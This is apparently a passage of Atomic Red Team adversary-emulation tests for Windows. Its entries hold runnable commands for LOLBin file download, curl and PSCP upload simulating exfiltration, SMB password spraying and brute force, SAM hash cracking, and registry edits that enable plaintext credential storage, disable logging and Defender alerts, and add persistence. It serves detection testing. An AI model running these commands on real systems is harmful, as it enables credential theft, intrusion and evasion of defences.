del AtomicTestFileT1105.js /Q >nul 2>&1
popd
T1105 command_prompt elevated windows svchost writing a file to a UNC path
Ingress Tool Transfer
svchost.exe writing a non-Microsoft Office file to a file with a UNC path. Upon successful execution, this will rename cmd.exe as svchost.exe and move it to c:\, then execute svchost.exe with output to a txt file.
copy C:\Windows\System32\cmd.exe C:\svchost.exe
C:\svchost.exe /c echo T1105 > \\localhost\c$\T1105.txt
T1105 command_prompt windows Download a File with Windows Defender MpCmdRun.exe
Ingress Tool Transfer
Uses Windows Defender MpCmdRun.exe to download a file from the internet (must have version 4.18 installed). The input arguments "remote_file" and "local_path" can be used to specify the download URL and the name of the output file. By default, the test downloads the Atomic Red Team license file to the temp directory. More info and how to find your version can be found here https://lolbas-project.github.io/lolbas/Binaries/MpCmdRun/
cd "%ProgramData%\Microsoft\Windows Defender\platform\4.18*"
MpCmdRun.exe -DownloadFile -url #{remote_file} -path #{local_path}
T1105 command_prompt windows File download with finger.exe on Windows
Ingress Tool Transfer
Simulate a file download using finger.exe. Connect to localhost by default, use custom input argument to test finger connecting to an external server. Because this is being tested on the localhost, you should not be expecting a successful connection https://www.exploit-db.com/exploits/48815 https://www.bleepingcomputer.com/news/security/windows-10-finger-command-can-be-abused-to-download-or-steal-files/
finger base64_filedata@#{remote_host}
T1105 command_prompt windows Curl Download File
Ingress Tool Transfer
The following Atomic utilizes native curl.exe, or downloads it if not installed, to download a remote DLL and output to a number of directories to simulate malicious behavior. Expected output will include whether the file downloaded successfully or not.
#{curl_path} -k #{file_download} -o c:\users\public\music\allthethingsx64.dll
#{curl_path} -k #{file_download} --output c:\users\public\music\allthethingsx64.dll
#{curl_path} -k #{file_download} -o c:\programdata\allthethingsx64.dll
#{curl_path} -k #{file_download} -o %Temp%\allthethingsx64.dll
T1105 command_prompt windows Curl Upload File
Ingress Tool Transfer
The following Atomic utilizes native curl.exe, or downloads it if not installed, to upload a txt file to simulate data exfiltration Expected output will include whether the file uploaded successfully or not.
#{curl_path} -T #{file_path} #{remote_destination}
#{curl_path} --upload-file #{file_path} #{remote_destination}
#{curl_path} -d #{file_path} #{remote_destination}
#{curl_path} --data #{file_path} #{remote_destination}
T1105 command_prompt windows Download a file with Microsoft Connection Manager Auto-Download
Ingress Tool Transfer
Uses the cmdl32 to download arbitrary file from the internet. The cmdl32 package is allowed to install the profile used to launch the VPN connection. However, the config is modified to download the arbitary file. The issue of cmdl32.exe detecting and deleting the payload by identifying it as not a VPN Servers profile is avoided by setting a temporary TMP folder and denying the delete permission to all files for the user. Upon successful execution the test will open calculator and Notepad executable for 10 seconds. reference: https://twitter.com/ElliotKillick/status/1455897435063074824 https://github.com/LOLBAS-Project/LOLBAS/pull/151 https://lolbas-project.github.io/lolbas/Binaries/Cmdl32/ https://strontic.github.io/xcyclopedia/library/cmdl32.exe-FA1D5B8802FFF4A85B6F52A52C871BBB.html
"#{Path_to_file}" 1>NUL
T1105 command_prompt windows Printer Migration Command-Line Tool UNC share folder into a zip file
Ingress Tool Transfer
Create a ZIP file from a folder in a remote drive
del %TEMP%\PrintBrm.zip >nul 2>&1 
#{Path_PrintBrm} -b -d #{Path_unc}  -f %TEMP%\PrintBrm.zip -O FORCE
T1105 command_prompt windows Lolbas replace.exe use to copy file
Ingress Tool Transfer
Copy file.cab to destination Reference: https://lolbas-project.github.io/lolbas/Binaries/Replace/
del %TEMP%\redcanary.cab >nul 2>&1
#{Path_replace} "#{replace_cab}" %TEMP% /A
T1105 command_prompt windows Lolbas replace.exe use to copy UNC file
Ingress Tool Transfer
Copy UNC file to destination Reference: https://lolbas-project.github.io/lolbas/Binaries/Replace/
del %TEMP%\redcanary.cab >nul 2>&1
#{Path_replace} #{replace_cab} %TEMP% /A
T1105 command_prompt windows certreq download
Ingress Tool Transfer
Use certreq to download a file from the web
certreq.exe -Post -config #{remote_file} c:\windows\win.ini #{local_path}
T1105 command_prompt windows Download a file using wscript
Ingress Tool Transfer
Use wscript to run a local VisualBasic file to download a remote file
wscript.exe "#{vbscript_file}"
T1105 command_prompt windows Nimgrab - Transfer Files
Ingress Tool Transfer
Use nimgrab.exe to download a file from the web.
cmd /c "PathToAtomicsFolder\..\ExternalPayloads\nimgrab.exe" #{remote_file} #{destination_path}
T1105 command_prompt elevated windows iwr or Invoke Web-Request download
Ingress Tool Transfer
Use 'iwr' or "Invoke-WebRequest" -URI argument to download a file from the web. Note: without -URI also works in some versions.
powershell.exe iwr -URI #{remote_file} -Outfile #{local_path}
T1105 command_prompt elevated windows Arbitrary file download using the Notepad++ GUP.exe binary
Ingress Tool Transfer
GUP is an open source signed binary used by Notepad++ for software updates, and can be used to download arbitrary files(.zip) from internet/github. [Reference](https://x.com/nas_bench/status/1535322182863179776?s=20) Upon execution, a sample zip file will be downloaded to C:\Temp\Sample folder
mkdir "c:\Temp"
cd #{working_dir}
GUP.exe -unzipTo "" "C:\Temp" "Sample #{target_file_url} #{target_file_sha256}"
T1105 command_prompt windows Remote File Copy using PSCP
Ingress Tool Transfer
Copy a staged file using PSCP.exe to a public target location.
fsutil file createnew C:\Temp\T1105_scp.zip 1048576
echo y | #{pscp_binary} -P #{scp_port} -pw #{scp_password} #{exfil_package} #{scp_user}@#{target_location}:#{target_filename}
T1106 command_prompt windows Execution through API - CreateProcess
Native API
Execute program by leveraging Win32 API's. By default, this will launch calc.exe from the command prompt.
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /out:"#{output_file}" /target:exe "#{source_file}"
%tmp%/T1106.exe
T1110.001 command_prompt windows Brute Force Credentials of single Active Directory domain users via SMB
Password Guessing
Attempts to brute force a single Active Directory account by testing connectivity to the IPC$ share on a domain controller
echo Password1> passwords.txt
echo 1q2w3e4r>> passwords.txt
echo Password!>> passwords.txt
echo Spring2022>> passwords.txt
echo ChangeMe!>> passwords.txt
@FOR /F "delims=" %p in (passwords.txt) DO @net use %logonserver%\IPC$ /user:"%userdomain%\#{user}" "%p" 1>NUL 2>&1 && @echo [*] #{user}:%p && @net use /delete %logonserver%\IPC$ > NUL
T1110.002 command_prompt elevated windows Password Cracking with Hashcat
Password Cracking
Execute Hashcat.exe with provided SAM file from registry of Windows and Password list to crack against
cd #{hashcat_exe}\..
#{hashcat_exe} -a 0 -m 1000 -r .\rules\Incisive-leetspeak.rule #{input_file_sam} #{input_file_passwords}
T1110.003 command_prompt windows Password Spray all Domain Users
Password Spraying
CAUTION! Be very careful to not exceed the password lockout threshold for users in the domain by running this test too frequently. This atomic attempts to map the IPC$ share on one of the Domain Controllers using a password of Spring2020 for each user in the %temp%\users.txt list. Any successful authentications will be printed to the screen with a message like "[*] username:password", whereas a failed auth will simply print a period. Use the input arguments to specify your own password to use for the password spray. Use the get_prereq_command's to create a list of all domain users in the temp directory called users.txt. See the "Windows FOR Loop Password Spraying Made Easy" blog by @OrOneEqualsOne for more details on how these spray commands work. https://medium.com/walmartlabs/windows-for-loop-password-spraying-made-easy-c8cd4ebb86b5
@FOR /F %n in (%temp%\users.txt) do @echo | set/p=. & @net use %logonserver%\IPC$ /user:"%userdomain%\%n" "#{password}" 1>NUL 2>&1 && @echo [*] %n:#{password} && @net use /delete %logonserver%\IPC$ > NUL
T1112 command_prompt windows Modify Registry of Current User Profile - cmd
Modify Registry
Modify the registry of the currently logged in user using reg.exe via cmd console. Upon execution, the message "The operation completed successfully." will be displayed. Additionally, open Registry Editor to view the new entry in HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced.
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /t REG_DWORD /v HideFileExt /d 1 /f
T1112 command_prompt elevated windows Modify Registry of Local Machine - cmd
Modify Registry
Modify the Local Machine registry RUN key to change Windows Defender executable that should be ran on startup. This should only be possible when CMD is ran as Administrative rights. Upon execution, the message "The operation completed successfully." will be displayed. Additionally, open Registry Editor to view the modified entry in HKLM\Software\Microsoft\Windows\CurrentVersion\Run.
reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /t REG_EXPAND_SZ /v SecurityHealth /d #{new_executable} /f
T1112 command_prompt elevated windows Modify registry to store logon credentials
Modify Registry
Sets registry key that will tell windows to store plaintext passwords (making the system vulnerable to clear text / cleartext password dumping). Upon execution, the message "The operation completed successfully." will be displayed. Additionally, open Registry Editor to view the modified entry in HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest.
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
T1112 command_prompt elevated windows BlackByte Ransomware Registry Changes - CMD
Modify Registry
This task recreates the steps taken by BlackByte ransomware before it worms to other machines. See "Preparing to Worm" section: https://redcanary.com/blog/blackbyte-ransomware/ The steps are as follows: <ol> <li>1. Elevate Local Privilege by disabling UAC Remote Restrictions</li> <li>2. Enable OS to share network connections between different privilege levels</li> <li>3. Enable long path values for file paths, names, and namespaces to ensure encryption of all file names and paths</li> </ol> The registry keys and their respective values will be created upon successful execution.
cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
cmd.exe /c reg add HKLM\SYSTEM\CurrentControlSet\Control\FileSystem /v LongPathsEnabled /t REG_DWORD /d 1 /f
T1112 command_prompt elevated windows Disable Windows Registry Tool
Modify Registry
Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows registry tool to prevent user modifying registry entry. See example how Agent Tesla malware abuses this technique: https://any.run/report/ea4ea08407d4ee72e009103a3b77e5a09412b722fdef67315ea63f22011152af/a866d7b1-c236-4f26-a391-5ae32213dfc4#registry
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\policies\system /v DisableRegistryTools /t REG_DWORD /d 1 /f
T1112 command_prompt elevated windows Disable Windows Task Manager application
Modify Registry
Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows task manager application. See example how Agent Tesla malware abuses this technique: https://any.run/report/ea4ea08407d4ee72e009103a3b77e5a09412b722fdef67315ea63f22011152af/a866d7b1-c236-4f26-a391-5ae32213dfc4#registry
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskmgr /t REG_DWORD /d 1 /f
T1112 command_prompt elevated windows Disable Windows Notification Center
Modify Registry
Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows notification center. See how remcos rat abuses this technique- https://tccontre.blogspot.com/2020/01/remcos-rat-evading-windows-defender-av.html
reg add HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Explorer /v DisableNotificationCenter /t REG_DWORD /d 1 /f
T1112 command_prompt elevated windows Disable Windows Shutdown Button
Modify Registry
Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows shutdown button. See how ransomware abuses this technique- https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/ransom.msil.screenlocker.a/
reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v shutdownwithoutlogon /t REG_DWORD /d 0 /f
T1112 command_prompt elevated windows Disable Windows LogOff Button
Modify Registry
Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows logoff button. See how ransomware abuses this technique- https://www.trendmicro.com/vinfo/be/threat-encyclopedia/search/js_noclose.e/2
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoLogOff /t REG_DWORD /d 1 /f
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v StartMenuLogOff /t REG_DWORD /d 1 /f
T1112 command_prompt elevated windows Disable Windows Change Password Feature
Modify Registry
Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows change password feature. See how ransomware abuses this technique- https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/ransom_heartbleed.thdobah
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableChangePassword /t REG_DWORD /d 1 /f
T1112 command_prompt elevated windows Disable Windows Lock Workstation Feature
Modify Registry
Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows Lock workstation feature. See how ransomware abuses this technique- https://www.bleepingcomputer.com/news/security/in-dev-ransomware-forces-you-do-to-survey-before-unlocking-computer/
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableLockWorkstation /t REG_DWORD /d 1 /f
T1112 command_prompt elevated windows Activate Windows NoDesktop Group Policy Feature
Modify Registry
Modify the registry of the currently logged in user using reg.exe via cmd console to hide all icons on Desktop Group Policy. Take note that some Group Policy changes might require a restart to take effect. See how Trojan abuses this technique- https://www.sophos.com/de-de/threat-center/threat-analyses/viruses-and-spyware/Troj~Krotten-N/detailed-analysis
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoDesktop /t REG_DWORD /d 1 /f
T1112 command_prompt elevated windows Activate Windows NoRun Group Policy Feature
Modify Registry
Modify the registry of the currently logged in user using reg.exe via cmd console to Remove Run menu from Start Menu Group Policy. Take note that some Group Policy changes might require a restart to take effect. See how Trojan abuses this technique- https://www.sophos.com/de-de/threat-center/threat-analyses/viruses-and-spyware/Troj~Krotten-N/detailed-analysis
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoRun /t REG_DWORD /d 1 /f
T1112 command_prompt elevated windows Activate Windows NoFind Group Policy Feature
Modify Registry
Modify the registry of the currently logged in user using reg.exe via cmd console to Remove Search menu from Start Menu Group Policy. Take note that some Group Policy changes might require a restart to take effect. See how Trojan abuses this technique- https://www.sophos.com/de-de/threat-center/threat-analyses/viruses-and-spyware/Troj~Krotten-N/detailed-analysis
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFind /t REG_DWORD /d 1 /f
T1112 command_prompt elevated windows Activate Windows NoControlPanel Group Policy Feature
Modify Registry
Modify the registry of the currently logged in user using reg.exe via cmd console to Disable Control Panel Group Policy. Take note that some Group Policy changes might require a restart to take effect. See how Trojan abuses this technique- https://www.sophos.com/de-de/threat-center/threat-analyses/viruses-and-spyware/Troj~Krotten-N/detailed-analysis
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /f
T1112 command_prompt elevated windows Activate Windows NoFileMenu Group Policy Feature
Modify Registry
Modify the registry of the currently logged in user using reg.exe via cmd console to Remove File menu from Windows Explorer Group Policy. Take note that some Group Policy changes might require a restart to take effect. See how Trojan abuses this technique- https://www.sophos.com/de-de/threat-center/threat-analyses/viruses-and-spyware/Troj~Krotten-N/detailed-analysis
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFileMenu /t REG_DWORD /d 1 /f
T1112 command_prompt elevated windows Activate Windows NoClose Group Policy Feature
Modify Registry
Modify the registry of the currently logged in user using reg.exe via cmd console to Disable and remove the Shut Down command Group Policy. Take note that some Group Policy changes might require a restart to take effect. See how Trojan abuses this technique- https://www.sophos.com/de-de/threat-center/threat-analyses/viruses-and-spyware/Troj~Krotten-N/detailed-analysis
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoClose /t REG_DWORD /d 1 /f
T1112 command_prompt elevated windows Activate Windows NoSetTaskbar Group Policy Feature
Modify Registry
Modify the registry of the currently logged in user using reg.exe via cmd console to Disable changes to Taskbar and Start Menu Settings Group Policy. Take note that some Group Policy changes might require a restart to take effect. See how ransomware abuses this technique- https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSetTaskbar /t REG_DWORD /d 1 /f
T1112 command_prompt elevated windows Activate Windows NoTrayContextMenu Group Policy Feature
Modify Registry
Modify the registry of the currently logged in user using reg.exe via cmd console to Disable context menu for taskbar Group Policy. Take note that some Group Policy changes might require a restart to take effect. See how ransomware abuses this technique- https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoTrayContextMenu /t REG_DWORD /d 1 /f
T1112 command_prompt elevated windows Activate Windows NoPropertiesMyDocuments Group Policy Feature
Modify Registry
Modify the registry of the currently logged in user using reg.exe via cmd console to hide Properties from "My Documents icon" Group Policy. Take note that some Group Policy changes might require a restart to take effect. See how ransomware abuses this technique- https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoPropertiesMyDocuments /t REG_DWORD /d 1 /f
T1112 command_prompt elevated windows Hide Windows Clock Group Policy Feature
Modify Registry
Modify the registry of the currently logged in user using reg.exe via cmd console to Hide Clock Group Policy. Take note that some Group Policy changes might require a restart to take effect. See how ransomware abuses this technique- https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v HideClock /t REG_DWORD /d 1 /f
T1112 command_prompt elevated windows Windows HideSCAHealth Group Policy Feature
Modify Registry
Modify the registry of the currently logged in user using reg.exe via cmd console to remove security and maintenance icon Group Policy. Take note that some Group Policy changes might require a restart to take effect. See how ransomware abuses this technique- https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v HideSCAHealth /t REG_DWORD /d 1 /f
T1112 command_prompt elevated windows Windows HideSCANetwork Group Policy Feature
Modify Registry
Modify the registry of the currently logged in user using reg.exe via cmd console to remove the networking icon Group Policy. Take note that some Group Policy changes might require a restart to take effect. See how ransomware abuses this technique- https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v HideSCANetwork /t REG_DWORD /d 1 /f
T1112 command_prompt elevated windows Windows HideSCAPower Group Policy Feature
Modify Registry
Modify the registry of the currently logged in user using reg.exe via cmd console to remove the battery icon Group Policy. Take note that some Group Policy changes might require a restart to take effect. See how ransomware abuses this technique- https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v HideSCAPower /t REG_DWORD /d 1 /f
T1112 command_prompt elevated windows Windows HideSCAVolume Group Policy Feature
Modify Registry
Modify the registry of the currently logged in user using reg.exe via cmd console to remove the volume icon Group Policy. Take note that some Group Policy changes might require a restart to take effect.. See how ransomware abuses this technique- https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v HideSCAVolume /t REG_DWORD /d 1 /f
T1112 command_prompt windows Windows Modify Show Compress Color And Info Tip Registry
Modify Registry
Modify the registry of the currently logged in user using reg.exe via cmd console to show compress color and show tips feature. See how hermeticwiper uses this technique - https://www.splunk.com/en_us/blog/security/detecting-hermeticwiper.html
reg  add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v ShowInfoTip /t REG_DWORD /d 0 /f
reg  add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v ShowCompColor /t REG_DWORD /d 0 /f
T1112 command_prompt elevated windows Windows Powershell Logging Disabled
Modify Registry
Modify the registry of the currently logged in user using reg.exe via cmd console to disable Powershell Module Logging, Script Block Logging, Transcription and Script Execution see https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.PowerShell::EnableModuleLogging
reg  add HKCU\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging /v EnableModuleLogging /t REG_DWORD /d 0 /f
reg  add HKCU\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging /v EnableScriptBlockLogging /t REG_DWORD /d 0 /f
reg  add HKCU\Software\Policies\Microsoft\Windows\PowerShell\Transcription /v EnableTranscripting /t REG_DWORD /d 0 /f
reg  add HKCU\Software\Policies\Microsoft\Windows\PowerShell /v EnableScripts /t REG_DWORD /d 0 /f
reg delete HKCU\Software\Policies\Microsoft\Windows\PowerShell /v EnableScripts /f >nul 2>&1
T1112 command_prompt elevated windows Windows Add Registry Value to Load Service in Safe Mode without Network
Modify Registry
Modify the registry to allow a driver, service, to persist in Safe Mode. see https://redcanary.com/blog/tracking-driver-inventory-to-expose-rootkits/ and https://blog.didierstevens.com/2007/03/26/playing-with-safe-mode/ for further details. Adding a subkey to Minimal with the name of your service and a default value set to Service, makes that your service will be started when you boot into Safe Mode without networking. The same applies for the Network subkey.
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\AtomicSafeMode" /VE /T REG_SZ /F /D "Service"
T1112 command_prompt elevated windows Windows Add Registry Value to Load Service in Safe Mode with Network
Modify Registry
Modify the registry to allow a driver, service, to persist in Safe Mode with networking. see https://redcanary.com/blog/tracking-driver-inventory-to-expose-rootkits/ and https://blog.didierstevens.com/2007/03/26/playing-with-safe-mode/ for further details. Adding a subkey to Netowrk with the name of your service and a default value set to Service, makes that your service will be started when you boot into Safe Mode with networking.
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\AtomicSafeMode" /VE /T REG_SZ /F /D "Service"
T1112 command_prompt elevated windows Disable Windows Toast Notifications
Modify Registry
Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows toast notification. See how azorult malware abuses this technique- https://app.any.run/tasks/a6f2ffe2-e6e2-4396-ae2e-04ea0143f2d8/
reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\PushNotifications /v ToastEnabled /t REG_DWORD /d 0 /f
T1112 command_prompt elevated windows Disable Windows Security Center Notifications
Modify Registry
Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows security center notification. See how azorult malware abuses this technique- https://app.any.run/tasks/a6f2ffe2-e6e2-4396-ae2e-04ea0143f2d8/
reg add HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\ImmersiveShell /v UseActionCenterExperience /t REG_DWORD /d 0 /f
T1112 command_prompt elevated windows Suppress Win Defender Notifications
Modify Registry
Modify the registry of the currently logged in user using reg.exe via cmd console to suppress the windows defender notification. See how azorult malware abuses this technique- https://app.any.run/tasks/a6f2ffe2-e6e2-4396-ae2e-04ea0143f2d8/
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\UX Configuration" /v Notification_Suppress /t REG_DWORD /d 1 /f
T1112 command_prompt elevated windows Allow RDP Remote Assistance Feature
Modify Registry
Modify the registry of the currently logged in user using reg.exe via cmd console to allow rdp remote assistance feature. This feature allow specific user to rdp connect on the targeted machine. See how azorult malware abuses this technique- https://app.any.run/tasks/a6f2ffe2-e6e2-4396-ae2e-04ea0143f2d8/
reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f
T1112 command_prompt windows NetWire RAT Registry Key Creation
Modify Registry
NetWire continues to create its home key (HKCU\SOFTWARE\NetWire) as well as adding it into the auto-run group in the victim’s registry. See how NetWire malware - https://app.any.run/tasks/41ecdbde-4997-4301-a350-0270448b4c8f/
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v NetWire /t REG_SZ  /d "C:\Users\admin\AppData\Roaming\Install\Host.exe" /f
reg add HKCU\SOFTWARE\NetWire /v HostId /t REG_SZ /d HostId-kai6Ci /f
reg add HKCU\SOFTWARE\NetWire /v "Install Date" /t REG_SZ /d "2021-08-30 07:17:27" /f
T1112 command_prompt windows Ursnif Malware Registry Key Creation
Modify Registry
Ursnif downloads additional modules from the C&C server and saves these in the registry folder HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\ More information - https://blog.trendmicro.com/trendlabs-security-intelligence/phishing-campaign-uses-hijacked-emails-to-deliver-ursnif-by-replying-to-ongoing-threads/
reg add HKCU\Software\AppDataLow\Software\Microsoft\3A861D62-51E0-15700F2219A4 /v comsxRes /t REG_BINARY  /d 72656463616e617279 /f
T1112 command_prompt elevated windows Terminal Server Client Connection History Cleared
Modify Registry
The built-in Windows Remote Desktop Connection (RDP) client (mstsc.exe) saves the remote computer name (or IP address) and the username that is used to login after each successful connection to the remote computer
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f
T1112 command_prompt elevated windows Disable Windows Error Reporting Settings
Modify Registry
Modify the registry of the currently logged in user using reg.exe via cmd console to disable windows error reporting settings. This Windows feature allow the use to report bug, errors, failure or problems encounter in specific application or process. See how azorult malware abuses this technique- https://app.any.run/tasks/a6f2ffe2-e6e2-4396-ae2e-04ea0143f2d8/
reg add HKLM64\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting /v DisableEnhancedNotifications /t REG_DWORD /d 1 /f
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting /v DisableEnhancedNotifications /t REG_DWORD /d 1 /f
T1112 command_prompt elevated windows DisallowRun Execution Of Certain Applications
Modify Registry
Modify the registry of the currently logged in user using reg.exe via cmd console to prevent user running specific computer programs that could aid them in manually removing malware or detecting it using security product.
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v DisallowRun /t REG_DWORD /d 1 /f
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun /f /t REG_SZ /v art1 /d "regedit.exe"
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun /f /t REG_SZ /v art2 /d "cmd.exe"
T1112 command_prompt elevated windows Enabling Restricted Admin Mode via Command_Prompt
Modify Registry
Enabling Restricted Admin Mode via Command_Prompt,enables an attacker to perform a pass-the-hash attack using RDP. See [Passing the Hash with Remote Desktop](https://www.kali.org/blog/passing-hash-remote-desktop/)
reg add "hklm\system\currentcontrolset\control\lsa" /f /v DisableRestrictedAdmin /t REG_DWORD /d 0
T1112 command_prompt elevated windows Mimic Ransomware - Enable Multiple User Sessions
Modify Registry
This test emulates Mimic ransomware's ability to enable multiple user sessions by modifying the AllowMultipleTSSessions value within the Winlogon registry key. See [Mimic Ransomware Overview] (https://www.trendmicro.com/en_us/research/23/a/new-mimic-ransomware-abuses-everything-apis-for-its-encryption-p.html)
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Winlogon /t REG_DWORD /v AllowMultipleTSSessions /d 1 /f
T1112 command_prompt elevated windows Mimic Ransomware - Allow Multiple RDP Sessions per User
Modify Registry
This test emulates Mimic ransomware's ability to enable multiple RDP sessions per user by modifying the fSingleSessionPerUser value within the Terminal Server registry key. See [Mimic Ransomware Overview] (https://www.trendmicro.com/en_us/research/23/a/new-mimic-ransomware-abuses-everything-apis-for-its-encryption-p.html)
reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f
T1112 command_prompt elevated windows Event Viewer Registry Modification - Redirection URL
Modify Registry
Modify event viewer registry values to alter the behavior of the online help redirection. Upon opening an event in event viewer and attempting to view the help page for the event, it will open the URL or execute the program defined in the redirection URL registry entry.
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Event Viewer" /v MicrosoftRedirectionURL /t REG_SZ /d "#{redirection_url}" /f
T1112 command_prompt elevated windows Event Viewer Registry Modification - Redirection Program
Modify Registry
Modify event viewer registry values to alter the behavior of the online help redirection. Upon opening an event in event viewer and attempting to view the help page for the event, it will execute the program defined in the redirection program registry entry.
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Event Viewer" /v MicrosoftRedirectionProgram /t REG_EXPAND_SZ /d "#{redirection_program}" /f
T1112 command_prompt elevated windows Enabling Remote Desktop Protocol via Remote Registry
Modify Registry
Enabling RDP through remote registry.
reg add "hklm\SYSTEM\CurrentControlSet\Control\Terminal Server\Winstations\RDP-Tcp" /v SecurityLayer /t REG_DWORD /d 0 /f
T1112 command_prompt elevated windows Disable Win Defender Notification
Modify Registry
Disable Win Defender Notification. Redline is using this to disable this win defender feature.
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t REG_DWORD /d 1 /f
T1112 command_prompt elevated windows Disable Windows OS Auto Update
Modify Registry
Disable Auto Update Windows OS feature. Redline is using this as part of its defense evasion.
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" /v "NoAutoUpdate" /t REG_DWORD /d 1 /f
T1112 command_prompt elevated windows Disable Windows Auto Reboot for current logon user
Modify Registry
Disable Windows Auto Reboot for current logon user. Redline is using this as part of its defense evasion.
